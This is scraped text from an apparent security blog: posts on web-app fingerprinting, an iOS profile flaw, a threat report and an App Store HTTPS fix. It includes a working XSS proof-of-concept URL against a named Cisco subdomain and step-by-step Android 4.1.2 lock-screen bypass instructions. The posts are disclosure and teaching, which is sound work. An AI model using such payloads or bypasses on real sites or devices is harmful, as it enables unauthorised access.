src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio3CWMUhovEcjrklqP5W9_v8T_lhO8Xj_lerQ2i1kHvdiDBdwGj6QRe7J54kEMgtXirTXHSZeVFHoSECOjI73YqrNvjRbug5kwgdt1iOkYMZFP_LV3dkdH196eM-XVvUuB3av4JmqAHuGn/s1600/3.png" title="Web-application-Fingerprinting-3" /></a></div><br />2) OWA<br />URL pattern<br />http://<site_name>/OWA/<br /><br />3) Joomla<br />URL pattern: http://<site_name>/component/<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEind3XXE1LNyMliGBIXw2FvP37ezOaCG8RUoXVF_aJBq9heB-Jvww0G5TyIQD3ixTAg4lTddqAHVa_xNOLFhnuT4d2D4Z3PyQ3W0FTEqAyBvrIwmN17LJTx8OlmSHTlNhczJmpzh1-fDpaU/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-4" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEind3XXE1LNyMliGBIXw2FvP37ezOaCG8RUoXVF_aJBq9heB-Jvww0G5TyIQD3ixTAg4lTddqAHVa_xNOLFhnuT4d2D4Z3PyQ3W0FTEqAyBvrIwmN17LJTx8OlmSHTlNhczJmpzh1-fDpaU/s1600/4.png" title="Web-application-Fingerprinting-4" /></a></div><br /><a name='more'></a><br /><br />4) SharePoint Portal<br />URL Pattern: /_layouts/* And similarly for majority of applications we can create regular expression rules to identify them.<br /><br />These regular expression’s combined together as a monolithic tool to identify all in one go or as a pluggable architecture for creating one pattern file for each type and work on it. Example of tools using this technique includes browser plugin’s like Wapplyzer and web technology finder and similar tools.<br /><br />File and Folder Presence (HTTP response codes)<br /><br />This approach doesn’t download the page however it starts looking for obvious trails of an application by directly hitting the URL and in course identifying found and not found application list. In starting days of internet this was easy, just download headers and see if it’s 200 OK or 404 not found and you are done.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0uj6OMEPTsfD2R2c5weiRuiuNdWveqVEFCxG14_BYVKaD9qUhYBgNv5hkhdlsxjOWprAKc0qe3-HL7YrO2tHvvrheGJgtfrDScI40I-bSH-JxbVjV0SLtEbAdXAmPmMQR2q59DZj6UNXz/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-5" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0uj6OMEPTsfD2R2c5weiRuiuNdWveqVEFCxG14_BYVKaD9qUhYBgNv5hkhdlsxjOWprAKc0qe3-HL7YrO2tHvvrheGJgtfrDScI40I-bSH-JxbVjV0SLtEbAdXAmPmMQR2q59DZj6UNXz/s1600/6.png" title="Web-application-Fingerprinting-5" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIMQVx0OnIhVzY7WzHTyFkP5er09fneckaQF3Hpc8NNYmsReeTolf7pq5lCO5etiWHM0G-j62BHU0Sg0ic7abAtaP_7IPhrza4G29pCOZUOy6b4YXP3oxGE7Lso4E5ACES2p6JcXUzKa7z/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Web-application-Fingerprinting-6" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIMQVx0OnIhVzY7WzHTyFkP5er09fneckaQF3Hpc8NNYmsReeTolf7pq5lCO5etiWHM0G-j62BHU0Sg0ic7abAtaP_7IPhrza4G29pCOZUOy6b4YXP3oxGE7Lso4E5ACES2p6JcXUzKa7z/s1600/7.png" title="Web-application-Fingerprinting-6" /></a></div><br />However in current scenario, people have been putting up custom 404 Pages and are actually sending 200 OK in case the page is not found. This complicates the efforts and hence the new approach is as follows.<br /><br />1) Download default page 200 OK.<br />2) Download a file which is guaranteed to be non-existing then mark it as a template for 404 and then proceed with detection logic.<br /><br />Based on this assumption and knowledge this kind of tools start looking for known files and folders on a website and try to determine the exact application name and version. Example of such scenario would be wp-login.php => wordpress /owa/ => Microsoft outlook web frontend.<br /><br />Checksum Based identification<br /><br />This is relatively a newer approach considered by far as most accurate approach in terms on application and specific version identification. This Technique basically works on below pattern.<br /><br />1) Create checksum local file and store in DB<br />2) Download static file from remote server<br />3) Create checksum<br />4) Compare with checksum stored in db and identified<br /><br />Disadvantages of Current automated Solutions<br /><br />1) First and foremost these tools get noisy especially in auto detection modes.<br />2) Large numbers of 404’s can immediately trigger alarms across the places.<br />3) Secondly they generally rely on the URL pattern we gave and fail to look beyond that. However it might be the case that site main link has reference links to its blog which might not be updated and could open gates for us.<br />4) They lack the humanly fuzziness.</div>

Web-application Fingerprinting

Methods of Web Application Finger Printing Historically Identification of Open Source applications have been easier as the behavior pattern ...

+ Read more »

Cisco ZeroClipboard Swf File XSS

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsLPzI7K_OpygRosdjX4B3tlxOLo_yBMPA6h3A99cJtuHqLDrnqHdH-gwQelEZ4UozFX2bIDaow5w7O2qjsnDpyDNHvXInc8vC62KkF7eDt2ZXkYl24rW32p5FYwyIK5WN0G1tC-YEgg/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdsLPzI7K_OpygRosdjX4B3tlxOLo_yBMPA6h3A99cJtuHqLDrnqHdH-gwQelEZ4UozFX2bIDaow5w7O2qjsnDpyDNHvXInc8vC62KkF7eDt2ZXkYl24rW32p5FYwyIK5WN0G1tC-YEgg/s1600/images.jpg" /></a></div><br />The security of  the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chances he would have for compromising your website. One of the reasons why i have managed to secure my places in most of the<b><a href="http://www.rafayhackingarticles.net/2009/03/about-me.html" target="_blank"> security hall of fames</a></b> was that i did not tried a single attack vectors, i tested a the target for lots of different attack vectors, one of them was swf. swf files are commonly found on mots of the websites. Though there are lots of other vulnerabilities for swf files, however i would stick to the topic of this post and would leave other's for upcoming posts.<br /><a name='more'></a>Recently, i was testing cisco for potential vulnerabilities, initially i took tested for SQLi, XSS, CSRF and other attacks, but was out of luck. Therefore, i decided to test it for swf file vulnerabilities. One of the common swf vulnerabilities i look for inside a website is for<b> "ZeroClipboard Xss"</b>.<br /><br /><b>What Is ZeroClipboard?</b><br /><br /><i>The ZeroClipboard library provides an easy way to copy text to the clipboard using an invisible Adobe Flash movie, and a JavaScript interface. The "Zero" signifies that the library is invisible and the user interface is left entirely up to you.</i><br /><i><br /></i><br />I used google to search, if any of cisco's subdomain or cisco.com itself contain this file, luckily i found the path to bx.cisco.com that contained <b>zeroclipboard.xss</b>. So i began testing for XSS and bingo it worked.<br /><br /><i><br /></i><b>Cisco Swf POC</b><br /><b><br /></b><i>http://bx.cisco.com/cbx-portal/js/zeroclipboard/ZeroClipboard.swf#?id=\"))}catch(e){alert(/XSSbyrafay/.source);}//&width=500&height=500</i><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCKc6diBv-074HPuNo8VbAoLPwkcB33V5N-mRLUZfprP-W67xtLlSH9qTX9vM66FKgZVbDxwPL_eJAavMDb0iVBJcN468AtVgH5beg4xaJrIz0IbNTYFwTPMIbtQm8IzUGxqHncXXcXlc/s1600/CISCO+XSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCKc6diBv-074HPuNo8VbAoLPwkcB33V5N-mRLUZfprP-W67xtLlSH9qTX9vM66FKgZVbDxwPL_eJAavMDb0iVBJcN468AtVgH5beg4xaJrIz0IbNTYFwTPMIbtQm8IzUGxqHncXXcXlc/s400/CISCO+XSS.png" width="400" /></a></div><b>Vulnerable Code</b><br /><br /><blockquote>public function ZeroC<i>lipboard()</i><i><br /></i><i>{ .... var flashvars:Object = LoaderInfo(this.root.loaderInfo).parameters;</i><i> id = flashvars.id; .... </i><i><br /></i><i>ExternalInterface.call("ZeroClipboard.dispatch", id, "load", null);</i></blockquote>As you can look from the above code is that id parameter from Externalinterface.call is passed to the second parameter, without being properly sanitized. Therefore it results into an XSS.<br /><br /><b>Further Reading</b><br /><b><br /></b>If you are really interested in learning about zeroclipboard xss, i would recommend you read the following articles:<br /><br /><b>http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html</b><br /><b>https://github.com/jonrohan/ZeroClipboard/issues/14</b><br /></div>

Cisco ZeroClipboard Swf File XSS

The security of  the target website depends upon the number of vectors an attacker knows, The more vectors an attacker knows the more chance...

+ Read more »

Vulnerability Discovered In iPhone - Poses Serious Threat To Users

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ferDP6vqaqtnprPnRhWs5xhBZazua0NUKbIxKEML6IMx-QEnAzqTNUKzI4WJm9575bUPikhcXGkRkQhv4Yy6zWHKfm9Nh5hIT1FSbATFiNYlmcFwYzaVQKwzJ4cDjjobgRdksTTEZtU/s1600/vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ferDP6vqaqtnprPnRhWs5xhBZazua0NUKbIxKEML6IMx-QEnAzqTNUKzI4WJm9575bUPikhcXGkRkQhv4Yy6zWHKfm9Nh5hIT1FSbATFiNYlmcFwYzaVQKwzJ4cDjjobgRdksTTEZtU/s400/vulnerability.jpg" width="375" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. <b><a href="http://blog.skycure.com/2013/03/malicious-profiles-sleeping-giant-of.html" rel="nofollow" target="_blank">Skycure, an Israeli company, states it to be a major flaw in iOS configuration which could post a malware threat.</a></b><br /><br />A file known as mobileconf is being attacked due to this vulnerability. This file is used by phones carriers to configure system-level settings including WiFi, VPN, email and APN.<br /><br />Skycure's CEO, Adi Sharabani, has taken the exploit to a test drive to explain how an iPhone can be controlled while retrieving victim's location and other sensitive information.<br /><br /><a name='more'></a><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxw77RYSN4iZlcbl0riBe5LBfM77gHe5vYJjCxVh0-lGBNpdoTbaRgw-iYZ4LkIoGsmSgfPMqEN-AcQnAulLbR6POXh3XR1CplmuM9oBky5ZrEppqSe8iAK3k99bkTlFhW8Oec2OfUnY/s1600/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCxw77RYSN4iZlcbl0riBe5LBfM77gHe5vYJjCxVh0-lGBNpdoTbaRgw-iYZ4LkIoGsmSgfPMqEN-AcQnAulLbR6POXh3XR1CplmuM9oBky5ZrEppqSe8iAK3k99bkTlFhW8Oec2OfUnY/s640/Critical+iOS+vulnerability+in+Configuration+Profiles+pose+malware+threat.png" width="640" /></a></div><h4 style="text-align: left;">Ways to get infected:</h4><br /><div style="text-align: left;"></div><div style="text-align: left;"></div><ol style="background-color: white; color: #333333; line-height: 19px; list-style-image: initial; list-style-position: initial; margin: 0.5em 0px; outline: none; padding: 0px 0px 0px 2em; text-align: justify;"><li style="margin: 0px; outline: none; padding: 0px;"><span style="white-space: pre-wrap;"><span style="font-family: inherit;">Victims browse to an attacker-controlled website, which promises them free access to popular movies and TV-shows. In order to get the free access, “all they have to do” is to install an iOS profile that will “configure” their devices accordingly.</span></span></li><li style="margin: 0px; outline: none; padding: 0px;"><span style="font-family: inherit; white-space: pre-wrap;">Victims receive a mail that promises them a “better battery performance” or just “something cool to watch” upon installation.</span></li></ol><div style="text-align: justify;"><span style="color: #333333;"><span style="line-height: 19px; white-space: pre-wrap;"><br /></span></span></div><br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYyhdi1I3Te5h0SG2zHAoknlaRrBd_8vLVPfjjE_LkrsZkMLyOxbn2u4Ds3TeNgf0wdu6Bn7tY6ZNJlG6aUjJq-EdGvXx2CjyUdMFEQCODtsZzcBsddlj0SU2DbKRH-KZbNAR1txOvyio/s1600/hack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYyhdi1I3Te5h0SG2zHAoknlaRrBd_8vLVPfjjE_LkrsZkMLyOxbn2u4Ds3TeNgf0wdu6Bn7tY6ZNJlG6aUjJq-EdGvXx2CjyUdMFEQCODtsZzcBsddlj0SU2DbKRH-KZbNAR1txOvyio/s400/hack.jpg" width="400" /></a></div><h4 style="text-align: left;">To avoid this attack one must follow these rules:</h4><br /><ul style="text-align: left;"><li>You should only install profiles from trusted websites or applications.</li><li>Make sure you download profiles via a secure channel (e.g., use profile links that start with https and not http).</li><li>Beware of non-verified mobileconfigs. While a verified profile isn't necessarily a safe one, a non-verified should certainly raise you suspicion.</li></ul><br />Cheers!<br /><br /><b>About the Author:</b><br />This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</div>

Vulnerability Discovered In iPhone - Poses Serious Threat To Users

Another vulnerability has been discovered on iPhone that could allow hackers to remotely control it. Skycure, an Israeli company, states it ...

+ Read more »

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQKHnapShAFFkdEsQU7EnaCueDTzK2YPwSxl9HNPcE2lb1Ml3HcE_kQw90AbJgr3Q0IXGqrABQQokPa4VJTHnLma5MuzlIg67MITz09l6vDddv4C6V9GONCGUNy6eaLQcdSxIj1T2fYig/s1600/GeoGrowthInfectedSites.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQKHnapShAFFkdEsQU7EnaCueDTzK2YPwSxl9HNPcE2lb1Ml3HcE_kQw90AbJgr3Q0IXGqrABQQokPa4VJTHnLma5MuzlIg67MITz09l6vDddv4C6V9GONCGUNy6eaLQcdSxIj1T2fYig/s640/GeoGrowthInfectedSites.bmp" width="577" /></a></div>One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and elimination of the threat. Ahh! The moment you come to the realisation that there are smarter people in this world who can shoot you point-blank without ever being caught. Yes, brutality is the name, the name of the game!<br /><a name='more'></a><br /><br />WebSense has kept up to speed in this game and they have <b><a href="http://www.websense.com/content/websense-2013-threat-report.aspx" rel="nofollow" target="_blank">released a report</a></b> to show for it. WebSense has released the 2013 Threat report enumerating an analysis on cyber threats. According to WebSense, cyber threats have increased over the years due to usage of ancient security protocols. Attackers are able to easily bypass these mechanisms and target mobile platforms and social media, the two most celebrated inventions of this century.<br /><br />Internet has been reported to be the 'attack vector and the primary support element of other attack trajectories'. Malicious websites have grown in number (almost 600%) and 85% of these are being hosted by legitimate but compromised providers.<br /><br />Genre of sites that were mainly attacked were:<br /><br /><ul style="text-align: left;"><li>Information Technology</li><li>Business and Economy</li><li>Sex</li><li>Travel</li><li>Shopping</li></ul><br />Probably because attackers wanted to cover all areas of human psyche and, in general, life? No wonder the number of threats and attacks have increased.<br /><br /><b>- Social Media</b> was one of the most exploited channels due to its large audience. Most of the links consisted of malicious content which were spread through the network. New features and interfaces also resulted in some amount of confusion leading to successful attacks on the user.<br /><br /><b>- Mobile Platform</b> were again easily attacked due to jailbreaking, and download and installation of malicious apps.<br /><br /><blockquote style="line-height: 19px; margin: 2em; padding: 0.1em 1.5em; position: relative; text-align: -webkit-auto;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXv5_jWP3keYyp1PGfswTAF0JZMCaTjffDvgEUo03yWg7HGbUahLV3iJ_Bn134D97CkwjVlOuor58SLi1AB3TdlvlJsi9plX6KiH6yXTB_SW2Rv8qum1ZFqP_jWC0qWCwhrUxUbPbqHA/s1600/MobileUSe.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghXv5_jWP3keYyp1PGfswTAF0JZMCaTjffDvgEUo03yWg7HGbUahLV3iJ_Bn134D97CkwjVlOuor58SLi1AB3TdlvlJsi9plX6KiH6yXTB_SW2Rv8qum1ZFqP_jWC0qWCwhrUxUbPbqHA/s640/MobileUSe.jpg" width="640" /></a></div><div style="margin-bottom: 1em; margin-top: 1em; padding: 0px;"><span style="background-color: white;"><span style="font-family: inherit;">Legitimate apps were also a cause for concern; many proved less secure than expected. Consider a study by Philipps University and Leibniz University in Germany involving 13,500 free apps downloaded from Google Play. Researchers found that 8 percent of these apps were vulnerable to man-in-the-middle attacks, and approximately 40 percent enabled the researchers to capture credentials for American Express, Diners Club, Paypal, bank accounts, Facebook,Twitter, Google, Yahoo, Microsoft Live ID, Box, WordPress, remote control servers, arbitrary email accounts, and IBM Sametime, among others.</span></span></div></blockquote><div style="font-size: 13px; line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"><span style="background-color: white; font-size: small; line-height: normal; text-align: left;"><span style="font-family: inherit;">WebSense stated that malicious apps mainly require three permissions:</span></span></div><div style="line-height: 19px; margin-bottom: 1em; margin-top: 1em; padding: 0px; text-align: -webkit-auto;"></div><ul style="text-align: left;"><li><span style="background-color: white; line-height: normal; text-align: left;"><span style="font-family: inherit;">82% of malicious apps send, receive, read or write SMS message.</span></span></li><li><span style="text-align: left;"><span style="font-family: inherit;">12.5% malicious apps require RECEIVE_WAP_PUSH permission.</span></span></li><li><span style="text-align: left;"><span style="font-family: inherit;">10% malicious apps asked for permission to install other apps.</span></span></li></ul><div style="text-align: left;"><b>- Email</b> was another vector that took to WebSense's notice as only 20% of the emails sent and received were legitimate. 80% were phishing and spam emails. It is very easy to fall pry to such attacks because the links present in these emails seem to be from "real people" but basically consist of links to compromised websites or the attachments present in them are infected.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjintOi5uHUIM4Tzk_SX_T_p3rYSl7khjJIUDg2DTuMVojhg10r_vUIImP0xOQOpL522YOxMo36ogbyn19tVIItz7fGhDpTMRBFYQPzVFuNKm9C5K2wDwNCvylCE7qn0dAYry_OY6LTiSE/s1600/EmailTheats.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjintOi5uHUIM4Tzk_SX_T_p3rYSl7khjJIUDg2DTuMVojhg10r_vUIImP0xOQOpL522YOxMo36ogbyn19tVIItz7fGhDpTMRBFYQPzVFuNKm9C5K2wDwNCvylCE7qn0dAYry_OY6LTiSE/s640/EmailTheats.jpg" width="640" /></a></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Report also introduced "time-delay" attack, "in which embedded web links are kept benign until after traditional email security defences are bypassed".</div><div style="text-align: left;"><br /></div><div style="text-align: left;">According to WebSense the following categories of malicious web links are present in Spam Email:</div><div style="text-align: left;"><ul style="text-align: left;"><li>Potentially Damaging Content | Suspicious sites with little or no useful content.</li><li>Web and Email Spam | Sites used in unsolicited commercial email.</li><li>Malicious Websites | Sites containing malicious code.</li><li>Phishing and other Frauds | Sites that counterfeit legitimate sites to elicit user information.</li><li>Malicious Embedded iFrame.</li></ul></div><div style="text-align: left;"><span style="font-family: inherit;">You can <b>read the full report by WebSense</b> which clearly states;</span></div><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><i style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;">“Solutions that focus solely on mobile, email, web or otherwise can no longer be trusted to defend against complex, multistage attacks that can move between attack vectors.”</span></i></div><div style="text-align: left;"><i style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;"><br /></span></i></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;">Wise friends, we are no longer... ALONE!</span></span></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;">Cheers!</span></span></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><b><span style="font-family: inherit;">About the Author:</span></b></span></div><div style="text-align: left;"><span style="background-color: white; text-align: -webkit-auto;"><span style="font-family: inherit;">This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</span></span></div><br /><ul style="font-size: 13px; line-height: 19px; list-style: none inside; margin: 1em 0px; padding: 0px 1em; text-align: -webkit-auto;"><li style="background-color: #3c3c3c; color: #999999; font-family: 'Lucida Grande', Helvetica, Arial, sans-serif;"></li></ul></div>

600% Increase In Cyber Attacks: WebSense Releases Threat Report 2013

One thing I love more than writing is online threat reports - all the blood, sweat and tears combined with the satisfaction of discovery and...

+ Read more »

Vulnerabilities Fixed in App Store Almost After A Year

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIEuErC14CpLclO22gWGHmTnrRNCEIC4BbASxUeWprP2_8z_UtUwrhUa59irJuqJPhVZHv3IoEaJ7OuwVI-M5wBBNz564bSJtlgSuT0PauNh84Dmg8lIncqsGmaj8xv4OVX4uFjD1rWiU/s1600/apple_bug.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="305" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIEuErC14CpLclO22gWGHmTnrRNCEIC4BbASxUeWprP2_8z_UtUwrhUa59irJuqJPhVZHv3IoEaJ7OuwVI-M5wBBNz564bSJtlgSuT0PauNh84Dmg8lIncqsGmaj8xv4OVX4uFjD1rWiU/s400/apple_bug.jpg" width="400" /></a></div><br />It is being reported that Apple has ignored its network's security for more than a year. A problem that a  Google developer has pointed out.<br /><br />Google Researcher, Elie Bursztein has stated on this <b><a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank">blog</a></b> that he had informed Apple of the security problems present in App Store that allowed attackers to steal passwords and/or install unwanted or expensive applications. <br /><a name='more'></a>This was done by exploiting Apple's resistance to use encryptions when any iDevice logged into App Store. This allowed the attacker to intercept communication occurring between an online user's device and App Store and insert his own commands into the system.<br /><br />The vulnerability could be exploited to carry out quite a few attacks on the user<b><a href="http://elie.im/blog/web/apple-finally-turns-https-on-for-the-app-store-fixing-a-lot-of-vulnerabilities/#.UTzPIqWpWfT" rel="nofollow" target="_blank"> according to Elie</a></b>:<br /><div style="text-align: left;"></div><div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"><span style="background-color: white; font-family: inherit;">- <strong>Password stealing</strong>: Trick the user into disclosing his or her password by using the application update notification mechanism to insert a fake prompt when the App Store is launched.</span></div><div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"><span style="background-color: white; font-family: inherit;">- <strong>App swapping</strong>: Force the user to install/buy the attacker’s app of choice instead of the one the user intended to install/buy. It is possible to swap a free app with a paid app.</span></div><div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"><span style="background-color: white; font-family: inherit;">- <strong>App fake upgrade</strong>: Trick the user into installing/buying the attacker’s app of choice by inserting fake app upgrades, or manipulating existing app upgrades.</span></div><div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"><span style="background-color: white; font-family: inherit;">- <strong>Preventing application installation</strong>: Prevent the user from installing/upgrading applications either by stripping the app out of the market or tricking the app into believing it is already installed.</span></div><div style="line-height: 1.5em; margin-bottom: 15px; margin-top: 15px; padding: 0px; text-align: justify;"><span style="background-color: white; font-family: inherit;">- <strong>Privacy leak</strong>: The App Store application update mechanism discloses in the clear the list of the applications installed on the device.</span></div><br />Apple responded to Elie's reports by switching on HTTPS for App Store only last week after a year of stalling appropriate decisions.<br /><br />Cheers!<br /><br /><b>About the Author:</b><br />This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.</div>

Vulnerabilities Fixed in App Store Almost After A Year

It is being reported that Apple has ignored its network's security for more than a year. A problem that a  Google developer has pointed ...

+ Read more »

How To Dodge Android 4.1.2 Passcode Lock - Vulnerability Exploited And Explained

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ5N1oyhqNq2783zvzcC0sW6wCi4rf3Wq7NXPrqBVrm-YxvuSWxwC85Lskr2mAqYxRvadjC32QIkFHnR6xY4sj5E0KijF5UiYKkCkQTnHuLK1uRI68KgSOSkTkF9uSI_sZXyD5oRK1Q30/s1600/Android-4.1-Jelly-Bean-Logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ5N1oyhqNq2783zvzcC0sW6wCi4rf3Wq7NXPrqBVrm-YxvuSWxwC85Lskr2mAqYxRvadjC32QIkFHnR6xY4sj5E0KijF5UiYKkCkQTnHuLK1uRI68KgSOSkTkF9uSI_sZXyD5oRK1Q30/s400/Android-4.1-Jelly-Bean-Logo.jpg" width="400" /></a></div><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Do you want to elude Note II's security even for a brief moment? <b><a href="http://www.rafayhackingarticles.net/2013/02/how-to-dodge-ios-612-passcode.html" target="_blank">With iOS 6.1.2 being owned by hackers</a></b>, it was time that someone took a look at Android's vulnerabilities.</span><br /><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;">The method that we are going to explain to you to bypass Android's security was found by Terence Eden on Samsung Galaxy Note II running Android 4.1.2. It allows users to temporarily get around the phone's lock screen without a password.</span></div><a name='more'></a><br /><div style="text-align: left;"><span style="font-family: inherit;"><br /></span></div><div style="text-align: left;"><span style="font-family: inherit;"><b style="background-color: white; color: #333333; line-height: 19px;">You can by-pass iPhone, iPad or iPod's security by following the steps given below:</b></span></div><div style="text-align: left;"><b style="background-color: white; color: #333333; line-height: 19px;"><span style="font-family: inherit;"><br /></span></b></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">1. Make sure your device is locked.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">2. Activate the screen.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">3. Enter "Emergency Call".</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">4. Tap on the "ICE" button found on the bottom left.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">5. Press and hold the home button for a few seconds and then release it.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">6. The phone's home screen will be displayed.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;">7. While the home screen is visible click on any app or widget and it will launch without the password.</span></span></div><div style="text-align: left;"><span style="color: #333333; font-family: inherit;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;">You can view messages or emails via this method briefly. It has also been reported that not all apps are vulnerable to this exploit.</span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;"><b><u>Disclaimer: </u></b><i>We request our readers to attempt the above hack at their own risk and for their own knowledge.</i></span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;">Cheers!</span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;"><br /></span></span></div><div style="text-align: left;"><span style="color: #333333;"><span style="line-height: 19px;"><b>About the Author:</b></span></span></div><div style="text-align: left;"><span 